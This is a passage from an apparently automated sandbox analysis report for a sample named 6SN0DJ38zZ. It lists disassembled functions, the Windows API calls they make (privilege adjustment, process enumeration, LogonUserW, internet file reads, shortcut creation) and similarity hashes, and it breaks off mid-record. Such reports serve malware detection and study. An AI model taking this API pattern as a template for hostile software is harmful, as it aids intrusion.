GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009D80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009D80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009D80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009D80F6

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 76ecbafbf2d5e49caadbfa3bd9ed2b8659158ce9ce615c5c8026372b4518276f
Instruction ID: cc7e9a9a8df6b4f026ea9dde3d935c45796461c7d1c79df5bbd0ceaadf3ef482
Opcode Fuzzy Hash: 76ecbafbf2d5e49caadbfa3bd9ed2b8659158ce9ce615c5c8026372b4518276f
Instruction Fuzzy Hash: D4F06231258308AFEB308FA5EC8DE673BACEF49B55B004136FA45D6251DB619C47DA60

Function 009EC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009EC432
CoCreateInstance.OLE32(00A12D6C,00000000,00000001,00A12BDC,?), ref: 009EC44A

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

CoUninitialize.OLE32 ref: 009EC6B7

Strings

.lnk, xrefs: 009EC3C6, 009EC3EE, 009EC3F8

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 8d0a24a577ae89d78f44fbf26203b0f24d0ed47b3435b39b643f61b40aae4d71
Instruction ID: 2f258f66794074f278214c01801fc2ee24f25a01d6a05ae554d2bb5bcee3faca
Opcode Fuzzy Hash: 8d0a24a577ae89d78f44fbf26203b0f24d0ed47b3435b39b643f61b40aae4d71
Instruction Fuzzy Hash: 19A14B71104205AFD700EF54C881EABB7E8FFC4358F44491DF5969B2A2DB71EA49CB62

Function 00984B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00984AD0), ref: 00984B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00984B57

Strings

GetNativeSystemInfo, xrefs: 00984B51
kernel32.dll, xrefs: 00984B40

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 6f8f40db6d255b4ea62a92d2a4797ffd6a79b1fd32c2d757338cbb7b5a228b04
Instruction ID: 92aa80df3787acbd13f986c52c86461a5a4d7b7c324285908ef4fdd560df5376
Opcode Fuzzy Hash: 6f8f40db6d255b4ea62a92d2a4797ffd6a79b1fd32c2d757338cbb7b5a228b04
Instruction Fuzzy Hash: 0BD01234A1071BDFD730EF71E818B0676D8BF05351B11CC3A9485E6A90E670D481CB54

Function 00993030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 6c7a6879cbbf5a120e2f8ccdbaa30b86e79300059cf2759f5b50054fb7e1334b
Instruction ID: 251a754f0cc748dfbb0e209c9a73706d1d3eb58103638e244ee5ba69f7b6ddf0
Opcode Fuzzy Hash: 6c7a6879cbbf5a120e2f8ccdbaa30b86e79300059cf2759f5b50054fb7e1334b
Instruction Fuzzy Hash: 68227A716083019FCB24EF18C881B6EB7E4AFC9314F54891DF89A97291DB75E904CB92

Function 009FEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 009FEE3D
Process32FirstW.KERNEL32(00000000,?), ref: 009FEE4B

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

Process32NextW.KERNEL32(00000000,?), ref: 009FEF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 009FEF1A

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 9d66debb7d77e131a4ca71253663814644557034bae5e93590b19bc37eb97e2f
Instruction ID: 9e118523b17b32bc9f6ab4566710d66c8d19301cda0d97d8eb1dd7e6090ba426
Opcode Fuzzy Hash: 9d66debb7d77e131a4ca71253663814644557034bae5e93590b19bc37eb97e2f
Instruction Fuzzy Hash: CA517B71504305AFD320EF24DC81F6BB7E8EF98710F50482DF595962A1EB70E909CB92

Function 009DE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 009DE628

Strings

(, xrefs: 009DE66E
|, xrefs: 009DE658

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 761699be660da32e6aed728cb8748b4bc781bba11ea4869480ac4bc8c7ad2d56
Instruction ID: 746a0c0e65592fcf4ddcd4c6e6471cf698e4c1f28ceb993b3bedfff6f40ad750
Opcode Fuzzy Hash: 761699be660da32e6aed728cb8748b4bc781bba11ea4869480ac4bc8c7ad2d56
Instruction Fuzzy Hash: B2323575A407059FDB28DF19C481AAAB7F0FF48320B15C56EE89ADB3A1E770E941CB44

Function 009F22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009F180A,00000000), ref: 009F23E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009F2418

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 2dad94dc65aa725ea452f6d1aa69b15d9c6143509b7a454f7bbefa511331a88e
Instruction ID: a0c6ee95032fed8390d97683732f4c2ab39253f900e2c2cdbc35137d9a053183
Opcode Fuzzy Hash: 2dad94dc65aa725ea452f6d1aa69b15d9c6143509b7a454f7bbefa511331a88e
Instruction Fuzzy Hash: DD41D6B160420DBFEB20DF95DC85FBBB7ADEB80714F10442AF705A6150DAB99E419750

Function 009EB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009EB40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009EB465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 009EB4B2

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: b34ea55e1ebad4a4ff79f6989ebf9308e05c5613ec25b4a45a524f213c555d22
Instruction ID: bb799e6fe2576cc47647d3ae3484a3e310b8fe44df334376ae0ee7c3087cc5f9
Opcode Fuzzy Hash: b34ea55e1ebad4a4ff79f6989ebf9308e05c5613ec25b4a45a524f213c555d22
Instruction Fuzzy Hash: CA214435A00108DFCB00EF95D884AEEBBB8FF89314F1480AAE905EB361DB319D56CB51

Function 009D87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8858
GetLastError.KERNEL32 ref: 009D8865

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 17052fbac28a0e73e78328b12d0400b53d1af7e993d2867efcc900b5c9924180
Instruction ID: 3c565849def26ce929d0f0a4404bc072391074483f48725567e3421f570046c5
Opcode Fuzzy Hash: 17052fbac28a0e73e78328b12d0400b53d1af7e993d2867efcc900b5c9924180
Instruction Fuzzy Hash: DB1160B2414305AFE728DF94DC85D6BB7BDEB45710B20852EE45597641EA30BC418B60

Function 009D874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 009D8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009D878B
FreeSid.ADVAPI32(?), ref: 009D879B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 487bd709ac0ea3c344561aa5752015bc4b567ad4a1b5808502e746b4ed37bf78
Instruction ID: e58dd1472638d25f280658f81ca81de400ea853d5396a142983629f6bf4a8890
Opcode Fuzzy Hash: 487bd709ac0ea3c344561aa5752015bc4b567ad4a1b5808502e746b4ed37bf78
Instruction Fuzzy Hash: 7CF04975E5130CBFDF00DFF4DC89AAEBBBCEF08701F1044A9A901E2681E6716A058B50

Function 009EC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009EC6FB
FindClose.KERNEL32(00000000), ref: 009EC72B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 8b30bf330ba49d74a353418aba63397e9afecefc051376cb0a50dd9091cb50d1
Instruction ID: 43066be4ffa395e5b69645e283ded7e5aabd21341d240b5e8fc91e325a1c3d9b
Opcode Fuzzy Hash: 8b30bf330ba49d74a353418aba63397e9afecefc051376cb0a50dd9091cb50d1
Instruction Fuzzy Hash: 931152716006059FDB10EF29D845A6AF7E9EF85324F04851DF9A597391DB30AC05CB81

Function 009EA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009F9468,?,00A0FB84,?), ref: 009EA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009F9468,?,00A0FB84,?), ref: 009EA0A9

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: a29653f2341ae2fd5e6e9a1bda2118e03e91f5fbcd1272f3534dc8f506eb1736
Instruction ID: c94e1f3ed8b809e446a0dc42e02899469f00e60cb4af35fa6b6fa20f3d288f49
Opcode Fuzzy Hash: a29653f2341ae2fd5e6e9a1bda2118e03e91f5fbcd1272f3534dc8f506eb1736
Instruction Fuzzy Hash: 7DF0823510522DABDB21AFA4DC48FEA776CBF09361F004165F919D6191D630AA41CBA1

Function 009D81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009D8309), ref: 009D81E0
CloseHandle.KERNEL32(?,?,009D8309), ref: 009D81F2

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: ab8fe7fd6d9803c20435490a621ed9b6df9f3a1c1c93beb4ea6dc33a623375c2
Instruction ID: 426e8d39180cb512cca07414eeb1d0bf7c702929f4a2bd3302e4d4907f221fa1
Opcode Fuzzy Hash: ab8fe7fd6d9803c20435490a621ed9b6df9f3a1c1c93beb4ea6dc33a623375c2
Instruction Fuzzy Hash: E4E0E671014610AFEB656B60EC09E7777EDEF44310724882DF86584871DB615C92DB50

Function 009AA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,009A8D57,?,?,?,00000001), ref: 009AA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009AA163

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1a8e47b77360de39c71523e97049387ca328d6aa185945d1593736c43faa576b
Instruction ID: 852d44631e73d4298108308c162102ad6177f869357cd873c91dcda56cc03cc3
Opcode Fuzzy Hash: 1a8e47b77360de39c71523e97049387ca328d6aa185945d1593736c43faa576b
Instruction Fuzzy Hash: EBB0923105820CAFCA106BD1EC09B883F68EB45BB2F404020F61D98860CB6254538A92

Function 009AF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a730e67b20c9e988eedb3bdb421b33a78cbacf338c21de24a0d831b6573f2238
Instruction ID: 0d8a13cd8e66671bc2b74dfb3c690fd10dc53bd2d289a52bb9278f2ec874d22b
Opcode Fuzzy Hash: a730e67b20c9e988eedb3bdb421b33a78cbacf338c21de24a0d831b6573f2238
Instruction Fuzzy Hash: DB320222D2DF014DD7239678D83237AA25DAFB73D4F15D737E81AB59A6EB28C4834140

Function 009B242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698c97193dc50df7bb436d5382a327ddf57ed5d5251bc8eecb87bede773d32a7
Instruction ID: 9707fd0b42a2f1164bed0fab5e7e314803fca3f2cbe8447899aceac616cbb394
Opcode Fuzzy Hash: 698c97193dc50df7bb436d5382a327ddf57ed5d5251bc8eecb87bede773d32a7
Instruction Fuzzy Hash: 66B10F20E2AF414DD32396798831336BB5CAFBB2E5F52D71BFC6A74D22EB2185834141

Function 009E8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 009E889B

Part of subcall function 009A520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009E8F6E,00000000,?,?,?,?,009E911F,00000000,?), ref: 009A5213
Part of subcall function 009A520A: __aulldiv.LIBCMT ref: 009A5233

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: ecda2e9ce205d7515f6c89274a0d8a37f5a8acf277039f067596ca0f01d5e1e1
Instruction ID: f3cc068b7a4006e38e4061949f1edc7d9841f5817b980fcf88169a9418f9bd28
Opcode Fuzzy Hash: ecda2e9ce205d7515f6c89274a0d8a37f5a8acf277039f067596ca0f01d5e1e1
Instruction Fuzzy Hash: 7121E4366355108BC729CF69D841B52B3E5EFA6310B288E6CD4F9CB2C0CA35BD05CB54

Function 009E4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009E4C4A

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 3ac592659a443a5a1244ebddd4680945d1e04c25c40cfe9e11b9f3aa88a3e6b1
Instruction ID: 12a61f0f5ef3c0108a5c5590c5c3575448ed8696fd9753b0a49cb619d1132979
Opcode Fuzzy Hash: 3ac592659a443a5a1244ebddd4680945d1e04c25c40cfe9e11b9f3aa88a3e6b1
Instruction Fuzzy Hash: 97D05E9116528939EC2E07229E0FFFE030CE340782FF485897181CB0C2EC84AC415430

Function 009D87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009D8389), ref: 009D87D1

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 259bb6160c0945c9ad0fcfb9aa43b2139889ef7966a9ac5e4c41dfac3020759f
Instruction ID: d0fb77535a9992a077eb880b69fa33b4d64eca6e3c0a6bdab008f95fba734f3a
